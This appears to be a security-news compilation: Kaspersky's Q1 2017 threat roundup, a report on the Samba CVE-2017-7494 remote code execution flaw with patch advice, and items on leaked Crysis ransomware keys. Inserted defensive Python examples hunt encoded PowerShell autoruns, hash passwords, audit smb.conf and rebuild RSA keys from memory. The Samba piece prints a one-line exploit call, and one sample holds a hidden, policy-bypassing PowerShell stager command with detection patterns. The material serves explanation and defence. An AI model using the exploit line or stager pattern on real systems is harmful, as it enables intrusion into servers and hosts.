The IDF, which led the research along with Kaspersky Lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.

IT threat evolution Q1 2017

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

IT threat evolution Q1 2017

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third-level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.
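The registry-resident PowerShell described above leaves a footprint that can be hunted without memory forensics: an autorun value that launches powershell.exe with an encoded, hidden-window or execution-policy-bypass argument. The following is an added example, not code from the Kaspersky investigation. It parses a .reg export of the Run keys, flags such values, and decodes the -EncodedCommand payload (base64 of the UTF-16LE script) so an analyst can read it. The registry entries and the encoded script are constructed placeholders, not indicators from the incident; the list of autorun keys and argument patterns is an assumption.

```python
import base64
import re

# Autostart locations checked here (assumed subset of the many autorun keys).
AUTORUN_KEYS = (
    r"\Microsoft\Windows\CurrentVersion\Run",
    r"\Microsoft\Windows\CurrentVersion\RunOnce",
)
# Argument patterns typical of a hidden, encoded PowerShell stager.
FLAG_PATTERNS = {
    "encoded": re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
}
# One REG_SZ line of a .reg export: "Name"="data" or @="data" for the default value.
VALUE_LINE = re.compile(r'^(?P<name>"[^"]*"|@)=(?P<value>".*")$')


def parse_reg_export(text: str):
    """Yield (key, value_name, string_data) for REG_SZ entries in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None:
            continue
        name = "(Default)" if m.group("name") == "@" else m.group("name").strip('"')
        # .reg escapes backslashes and double quotes inside string data.
        data = m.group("value")[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        yield key, name, data


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand carries base64 of the UTF-16LE script text."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def find_registry_powershell(text: str) -> list:
    """Return findings for autorun values that invoke PowerShell with stager-like flags."""
    findings = []
    for key, name, data in parse_reg_export(text):
        if not any(key.lower().endswith(k.lower()) for k in AUTORUN_KEYS):
            continue
        if "powershell" not in data.lower():
            continue
        hits = {label: bool(p.search(data)) for label, p in FLAG_PATTERNS.items()}
        m = FLAG_PATTERNS["encoded"].search(data)
        decoded = decode_encoded_command(m.group(1)) if m else None
        findings.append({"key": key, "value": name, "flags": hits, "decoded": decoded})
    return findings


def _encode_for_powershell(script: str) -> str:
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed .reg export (placeholder entries, not data from the bank incident).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"WinUpdate"="powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc {enc}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\OneDrive.exe\" /background"
""".format(enc=_encode_for_powershell("Start-Sleep 1; Write-Output 'constructed placeholder stage'"))


if __name__ == "__main__":
    for f in find_registry_powershell(SAMPLE_REG):
        print(f["key"], f["value"], f["flags"])
        print("  decoded:", f["decoded"])
```

In a real hunt the input would be an export taken with reg.exe from each host (or the equivalent values pulled by an EDR agent); the decoded script is what the analyst then reads for the next stage, which in the case above was Meterpreter.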

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discussed its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor’. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

IT threat evolution Q1 2017

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories

Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life!’ Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. Once they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch a DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household items such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built-in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home is to ensure the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large scale attack also highlights the need for manufacturers to consider security by design, rather than as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.
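The two pieces of advice above, salted password hashing on the provider side and long mixed-character passwords on the user side, are shown together in the following added example (not code from the Kaspersky report). Passwords are stored as salted PBKDF2-HMAC-SHA256 with a per-user random salt and compared in constant time, and a small policy check applies the 15-character, letters-plus-digits-plus-symbols rule quoted above. The storage format and the default iteration count are assumptions to be tuned for a real deployment.

```python
import hashlib
import hmac
import os
import string

# Assumed work factor; raise it as hardware allows. Stored alongside each hash so it can be increased later.
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password: str, salt: bytes = None, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' with a fresh random salt.

    A unique salt per user means two users with the same password get different
    hashes, and a leaked table cannot be attacked with one precomputed dictionary.
    """
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
        )
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:          # malformed record: treat as a failed login, never as a crash
        return False


def password_weaknesses(password: str) -> list:
    """Apply the rule quoted above: at least 15 characters mixing letters, numbers and symbols."""
    problems = []
    if len(password) < 15:
        problems.append("shorter than 15 characters")
    if not any(c in string.ascii_letters for c in password):
        problems.append("no letters")
    if not any(c in string.digits for c in password):
        problems.append("no digits")
    if not any(c in string.punctuation for c in password):
        problems.append("no symbols")
    return problems


if __name__ == "__main__":
    pw = "Correct-Horse-Battery-9"          # constructed sample password
    record = hash_password(pw)
    print(record)
    print("login ok:", verify_password(pw, record))
    print("weaknesses of 'password':", password_weaknesses("password"))
```

Keeping the iteration count inside the stored record is what lets a provider raise the work factor over time: old records keep verifying, and can be re-hashed at the user's next successful login.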

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.


7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely
25.5.2017 thehackernews Vulnerebility
A 7-year-old critical remote code execution vulnerability has been discovered in the Samba networking software that could allow a remote attacker to take control of affected Linux and Unix machines.
Samba is an open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system.
The newly discovered remote code execution vulnerability (CVE-2017-7494) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.
Linux version of EternalBlue Exploit?

According to the Shodan search engine, more than 485,000 Samba-enabled computers expose port 445 on the Internet, and researchers at Rapid7 found that more than 104,000 internet-exposed endpoints appear to be running vulnerable versions of Samba, 92,000 of them versions that are no longer supported.
Because Samba is the SMB protocol implementation on Linux and UNIX systems, some experts are calling the flaw the "Linux version of EternalBlue", the exploit used by the WannaCry ransomware.
...or should I say SambaCry?
Given the number of exposed systems and how easy the bug is to exploit, the flaw could be used at scale with wormable capabilities, although, unlike EternalBlue, an attacker needs a share they can write to and has to know (or guess) the server-side path of the file they uploaded.
Home networks with network-attached storage (NAS) devices could also be vulnerable.
Exploit Code Released! (Bonus: Metasploit Module)

The flaw lies in the way Samba loads shared-library modules. When a client asks smbd to open a named pipe, the name it supplies is treated as a module to load, so a remote attacker can upload a shared library to a writable share and then hand the server that file's path, causing smbd to load and execute the attacker's code inside the server process.
The vulnerability is trivially easy to exploit: a single line of code is enough to get malicious code running on an affected system.
simple.create_pipe("/path/to/target.so")
The exploit has also been ported to Metasploit, the penetration testing framework, so researchers and attackers alike can exploit the flaw with little effort.
Patch and Mitigations
Samba's maintainers have patched the issue in versions 4.6.4, 4.5.10 and 4.4.14 and are urging anyone running a vulnerable version to install the update as soon as possible.
If you cannot upgrade to a fixed version immediately, you can work around the vulnerability by adding the following line to the [global] section of your Samba configuration file, smb.conf:
nt pipe support = no
Once added, restart the SMB daemon (smbd). The change disables some functionality that Windows clients expect and can stop them from fully accessing some shares, so treat it as a stopgap until the patch is installed.
Linux distribution vendors, including Red Hat and Ubuntu, have already released patched packages for their users; the larger risk is NAS devices, whose firmware is often not updated as quickly.
Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."
Update: Samba maintainers have also provided patches for older and unsupported versions of Samba.
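A small audit script for the two questions this section raises: does a given Samba version carry the fix, and does the configuration still expose the attack path the advisory describes (a share clients can write to, with nt pipe support left at its default). This is an added example, not code from the Samba project or the original article. The smb.conf text is constructed, and the version check only knows upstream release numbers, so a distribution package that backported the fix without bumping its version would be reported as unpatched.

```python
"""Audit smb.conf and a Samba version string for the CVE-2017-7494 preconditions.

Added example for this article; not code from the Samba project. The sample
configuration below is constructed for illustration.
"""
import configparser
import re

# Constructed sample: one guest-writable share, one authenticated-writable
# share, one read-only share, and no workaround in [global].
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = NAS

[public]
   path = /srv/public
   guest ok = yes
   read only = no

[backups]
   path = /srv/backups
   writeable = yes
   valid users = admin

[docs]
   path = /srv/docs
   read only = yes
"""

# First fixed release per branch, from the Samba advisory quoted above.
FIXED_RELEASES = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
YES = {"yes", "true", "1"}


def version_is_patched(version):
    """True if an upstream Samba version string carries the CVE-2017-7494 fix.

    Indicative only: distributions backport fixes without changing the version,
    and branches older than 4.4 need the maintainers' separate patches.
    """
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised Samba version: %r" % version)
    parts = tuple(int(x) for x in m.groups())
    if parts < (3, 5, 0):
        return True                      # advisory: affected from 3.5.0 onwards
    branch = parts[:2]
    if branch in FIXED_RELEASES:
        return parts >= FIXED_RELEASES[branch]
    return branch > (4, 6)               # later branches shipped after the fix


def parse_smb_conf(text):
    """smb.conf is INI-like: '=' separated, ';' or '#' comments, keys
    case-insensitive with internal whitespace collapsed."""
    cp = configparser.RawConfigParser(delimiters=("=",), strict=False,
                                      empty_lines_in_values=False)
    cp.optionxform = lambda key: re.sub(r"\s+", " ", key.strip().lower())
    # Samba indents freely; strip it so configparser never sees continuation lines.
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))
    return cp


def share_is_writable(section):
    """Samba defaults to 'read only = yes'; 'writeable', 'writable' and
    'write ok' are inverted synonyms, and the last setting seen wins."""
    writable = False
    for key, value in section.items():
        value = value.strip().lower()
        if key in ("writeable", "writable", "write ok"):
            writable = value in YES
        elif key == "read only":
            writable = value not in YES
    return writable


def audit(text):
    """Report nt pipe support, writable shares, and whether both preconditions hold."""
    cp = parse_smb_conf(text)
    glob = next((cp[s] for s in cp.sections() if s.lower() == "global"), {})
    pipes = glob.get("nt pipe support", "yes").strip().lower() in YES
    writable = []
    for name in cp.sections():
        if name.lower() == "global":
            continue
        sec = cp[name]
        if share_is_writable(sec):
            guest = sec.get("guest ok", sec.get("public", "no")).strip().lower() in YES
            writable.append({"share": name, "guest": guest})
    return {
        "nt_pipe_support": pipes,
        "writable_shares": writable,
        # The advisory's attack needs both: somewhere to drop the .so and a
        # named pipe request to make smbd load it.
        "exploitable_as_configured": pipes and bool(writable),
    }


if __name__ == "__main__":
    print(version_is_patched("4.5.10"), audit(SAMPLE_SMB_CONF))
```

Run it against a copy of the real smb.conf (testparm -s output works too, since it prints the effective configuration) and the output of smbd -V; a guest-writable share on an unpatched build is the worst case, because no credentials are needed to plant the library.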
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
So far, however, the company has released firmware fixes only for ReadyNAS products running OS 6.x.


Master Keys for Crysis ransomware released on a forum
25.5.2017 securityaffairs Ransomware

Researchers at ESET security firm have discovered that someone has released 200 master keys for the latest variants of the prominent Crysis ransomware.
While security experts continue to investigate the WannaCry attack, someone has released 200 master keys for the latest variants of the prominent Crysis ransomware. Files encrypted by these versions have the .wallet or .onion extension appended to their original names.

Antivirus firm ESET has used the leaked information to develop the ESET Crysis decrypting tool that is available for download on the company “utilities page.”

The master keys were posted by a new member of the BleepingComputer.com forums in a thread that aims to help victims of this threat.


This is the third time that someone published the master key for the Crysis ransomware.

“This has become a habit of the Crysis operators lately – with this being the third time keys were released in this manner. Since the last set of decryption keys was published, Crysis ransomware attacks have been detected by our systems over ten thousand times.” reads the blog post published by ESET.

Decryption tools allow victims of the ransomware-based campaigns to restore their files without paying the ransom to the criminal organizations.

Recently Quarkslab researcher Adrien Guinet published a tool, called Wanadecrypt, that he used to recover the decryption key needed to restore files on an infected Windows XP computer. He tested it successfully on a small number of infected XP machines, but it is not clear whether the technique works on every PC.

Guinet's technique recovers, from the memory of the infected machine, the prime numbers of the RSA key pair used by the WannaCry ransomware, which allows the secret key to be rebuilt for free; it works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008.

Security researcher Benjamin Delpy developed another tool, called WanaKiwi, that not only retrieves the prime numbers from memory but also automates the whole decryption process for WannaCry-encrypted files.

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 as explained by Matt Suiche from security firm Comae Technologies.
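The arithmetic behind the prime-recovery approach described above, as an added example (this is not Wanadecrypt or WanaKiwi code): if one prime factor of the RSA modulus can be read out of process memory, the other factor and the private exponent follow directly, and a key wrapped with the public key can be unwrapped again. The key pair, the "memory image" and the wrapped file key below are all constructed toy values so the script runs offline, and the search routine is a simplified stand-in for the tools' memory scanning.

```python
"""Rebuild an RSA private key from one prime recovered from memory.

Added example for this article; not the Wanadecrypt or WanaKiwi code.
Everything here (key pair, memory image, wrapped file key) is constructed so
the script runs offline; real keys are 2048-bit and the memory image would be
a dump of the ransomware process.
"""
from math import gcd

# Constructed toy primes. A real modulus is 2048 bits; the arithmetic is identical.
P = 1000000007
Q = 998244353
E = 65537

# Constructed "memory image": junk, then P stored little-endian (the byte order
# CryptoAPI uses for big numbers), then more junk.
FAKE_MEMORY = b"\x00" * 5 + b"ABCDEFGH" + P.to_bytes(4, "little") + b"\xff\xee\xdd\xcc"


def make_public_key(p, q, e=E):
    """What the victim still has on disk: the public modulus and exponent."""
    return p * q, e


def scan_memory_for_factor(n, memory, word_size):
    """Simplified stand-in for the tools' memory scan: read every offset as a
    little-endian integer and keep the first one that divides n."""
    for off in range(len(memory) - word_size + 1):
        cand = int.from_bytes(memory[off:off + word_size], "little")
        if 1 < cand < n and n % cand == 0:
            return cand, off
    return None, None


def recover_private_exponent(n, e, leaked_prime):
    """Given (n, e) and one prime factor, return the private exponent d."""
    if n % leaked_prime != 0:
        raise ValueError("candidate does not divide n; keep scanning")
    p = leaked_prime
    q = n // p
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e has no inverse modulo phi(n)")
    return pow(e, -1, phi)


def rsa_wrap(n, e, key_bytes):
    """Textbook RSA on a small integer (no padding), enough to show the idea."""
    m = int.from_bytes(key_bytes, "big")
    if m >= n:
        raise ValueError("message too large for this modulus")
    return pow(m, e, n)


def rsa_unwrap(n, d, c, length):
    return pow(c, d, n).to_bytes(length, "big")


def recover_file_key(n, e, memory, wrapped, key_len, word_size=4):
    """End to end: find a factor in memory, rebuild d, unwrap the per-file key.
    Returns None when no factor of n is present in the image."""
    prime, _ = scan_memory_for_factor(n, memory, word_size)
    if prime is None:
        return None
    d = recover_private_exponent(n, e, prime)
    return rsa_unwrap(n, d, wrapped, key_len)


if __name__ == "__main__":
    n, e = make_public_key(P, Q)
    wrapped = rsa_wrap(n, e, b"aes-key")      # constructed 7-byte "file key"
    print(recover_file_key(n, e, FAKE_MEMORY, wrapped, 7))
```

The whole approach depends on the primes still being in memory: once the process has exited or the machine has been rebooted there is nothing to scan, which is why the tools only help victims who have not powered off.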

Despite the efforts of law enforcement and security firms in the fight against ransomware, this category of malware remains one of the most dangerous computer threats.

“Prevention is essential in keeping users safe. Therefore, we recommend that all users keep their operating systems and software updated, use reliable security solutions with multiple layers of protection, and regularly back up all important and valuable data at an offline location (such as external storage).” concluded ESET.


Microsoft Unveils Special Version of Windows 10 For Chinese Government
25.5.2017 thehackernews IT
China is very strict about censorship and has become very wary of adopting foreign technologies.
The country banned Microsoft's Windows operating system on government computers in 2014 amid concerns about security and US surveillance.
Since then, China has been pushing its own custom version of Windows XP and its forked version of Ubuntu Linux.
To address this and target the world's largest market, Microsoft's CEO for the Greater China region confirmed last year that the company was working on a Chinese version of Windows 10 with "more management and security controls" and less bloatware.
Microsoft has now announced a new version of Windows 10 that is ready for Chinese government agencies to use.
At an event in Shanghai on Tuesday, Microsoft announced Windows 10 China Government Edition, designed specifically for the Chinese government. The OS is based on Windows 10 Enterprise Edition, with a few tweaks to keep Chinese officials happy.
Windows 10 Enterprise Edition already provides many of the security, identity and manageability features governments and enterprises need, but Windows 10 China Government Edition additionally lets the government use the management features to monitor and deploy updates as needed, manage telemetry, and use its own encryption algorithms.
Designed to work with Chinese Encryption Algorithms
Microsoft lets the Chinese government use its own encryption algorithms in Windows 10 China Government Edition to secure data that it does not want others to see.
Allows to Remove Unwanted Apps
